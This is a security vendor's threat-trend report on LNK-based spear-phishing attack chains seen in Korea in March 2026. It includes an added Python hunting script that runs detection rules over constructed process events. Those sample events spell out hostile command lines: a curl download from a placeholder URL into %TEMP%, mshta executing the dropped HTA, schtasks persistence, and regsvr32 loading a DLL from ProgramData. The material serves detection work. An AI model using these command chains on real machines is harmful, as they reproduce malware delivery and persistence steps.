March 2026 APT Attack Trends Report (Domestic)
Overview
AhnLab monitored APT attacks against domestic targets during March 2026. Most of the attacks were launched through spear-phishing emails sent after reconnaissance of specific targets.
APT Attack Trends in Korea
The majority of distribution vectors were shortcut (.lnk) files, with LNK-based attacks dominating. Type A uses the LNK to run PowerShell, which downloads and executes AutoIt malware together with a copy of curl.exe and establishes persistence through Task Scheduler. Type B uses the system's built-in curl.exe to download a malicious HTA to %TEMP%, then executes a decoy alongside a sys.dll-based, memory-loaded backdoor with infostealer-killer functionality. Type C creates a Base64-encoded script and downloads a decoy and additional scripts from GitHub to deliver XenoRAT-family malware. Type D is a multi-stage chain (XML, VBS, PowerShell, BAT, then Python) that installs a backdoor capable of remote command execution and file control. Type E uses a JSE script to create malicious DLLs and decoys in %ProgramData%, then loads the DLLs into the memory of regsvr32.exe to perform backdoor functions.
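The five LNK-driven chains above share a handful of choke points that are visible in endpoint process telemetry: a script host spawning curl.exe to write into a user-writable directory, mshta.exe running an .hta from %TEMP%, schtasks.exe creating a task whose action lives under a user profile, regsvr32.exe registering a DLL from %ProgramData%, and a python.exe whose ancestry is cmd.exe, powershell.exe, wscript.exe. The following Python is an added example, not AhnLab's code or anything taken from the report; it runs these hunting rules over a constructed set of process-creation events (field names modeled loosely on Sysmon Event ID 1; all paths, PIDs and the http://placeholder.invalid URL are made up).

```python
"""Hunting rules for the LNK-based execution chains described in the report.

Added example, not AhnLab code. EVENTS is constructed sample telemetry; the
field names (pid, ppid, image, command_line) mirror common EDR/Sysmon data.
"""
import re

# Constructed process-creation events (not real telemetry). The URL and every
# path are placeholders.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    # Types A/B: the LNK launches PowerShell, which calls curl.exe to drop a payload in %TEMP%
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c <encoded>"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe -s -o C:\Users\u\AppData\Local\Temp\a.hta http://placeholder.invalid/x"},
    {"pid": 202, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Users\u\AppData\Local\Temp\a.hta"},
    # Type A: persistence via a scheduled task whose action lives in a user-writable path
    {"pid": 203, "ppid": 200, "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r"schtasks.exe /create /sc minute /mo 1 /tn Update /tr C:\Users\u\AppData\Roaming\AutoIt3.exe"},
    # Type E: JSE script host, then regsvr32 loading a DLL from %ProgramData%
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe C:\Users\u\Downloads\doc.jse"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\ProgramData\svc\x.dll"},
    # Type D: VBS -> PowerShell -> BAT -> Python
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe C:\Users\u\Downloads\a.vbs"},
    {"pid": 401, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -ep bypass -f stage.ps1"},
    {"pid": 402, "ppid": 401, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\r.bat"},
    {"pid": 403, "ppid": 402, "image": r"C:\Users\u\AppData\Local\Temp\py\python.exe",
     "command_line": "python.exe s.py"},
    # Benign noise that must not fire
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

# Directories an unprivileged user can write to; payload drops and task actions here are suspicious.
USER_WRITABLE = re.compile(
    r"\\(?:AppData\\Local\\Temp|ProgramData|AppData\\Roaming|Users\\[^\\]+\\Downloads)\\", re.I)
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: dict, pid: int) -> list:
    """Image basenames from the process itself up to the root (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def hunt(events: list) -> list:
    """Return (pid, rule_name) pairs for events matching any of the five rules."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, cl = basename(e["image"]), e["command_line"]
        chain = ancestry(by_pid, e["pid"])
        # Rule 1 (Types A/B): curl.exe under a script host, writing to a user-writable directory
        if img == "curl.exe" and SCRIPT_HOSTS & set(chain[1:]) and USER_WRITABLE.search(cl):
            hits.append((e["pid"], "curl_download_to_user_writable"))
        # Rule 2 (Type B): mshta.exe executing an .hta out of %TEMP%
        if img == "mshta.exe" and re.search(r"\\Temp\\\S+\.hta", cl, re.I):
            hits.append((e["pid"], "mshta_hta_from_temp"))
        # Rule 3 (Type A): scheduled task created with an action in a user-writable path
        if img == "schtasks.exe" and "/create" in cl.lower() and USER_WRITABLE.search(cl):
            hits.append((e["pid"], "schtasks_user_writable_action"))
        # Rule 4 (Type E): regsvr32.exe registering a DLL that lives in %ProgramData%
        if img == "regsvr32.exe" and re.search(r"\\ProgramData\\", cl, re.I):
            hits.append((e["pid"], "regsvr32_programdata_dll"))
        # Rule 5 (Type D): python under cmd.exe <- powershell.exe <- wscript/cscript
        if (img.startswith("python") and chain[1:3] == ["cmd.exe", "powershell.exe"]
                and len(chain) > 3 and chain[3] in ("wscript.exe", "cscript.exe")):
            hits.append((e["pid"], "script_host_powershell_bat_python_chain"))
    return hits


if __name__ == "__main__":
    for pid, rule in hunt(EVENTS):
        print(f"pid={pid} rule={rule}")
```

The rules key on parent-child relationships and drop locations rather than on file names or hashes, so they keep matching when the campaign rotates payload names; the trade-off is that legitimate admin scripting can trip Rules 1 and 3, so they are better treated as hunting leads to be reviewed alongside the report's IoCs than as blocking signatures.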
AhnLab Response Status
AhnLab detects and tracks a number of related samples under registered detection names and monitors the threat group's activities through ASEC. The full report lists multiple file names, MD5 hashes, and malicious URLs/C2 domains; undetected variants may also exist.
Conclusion
The attacks are delivered in various formats disguised as legitimate documents and files, and ultimately lead to system takeover and information exfiltration through backdoors, infostealers, keyloggers, and similar tools. Be cautious of emails and attachments from unknown sources, and keep the operating system, browser, and security products up to date to help mitigate the threat.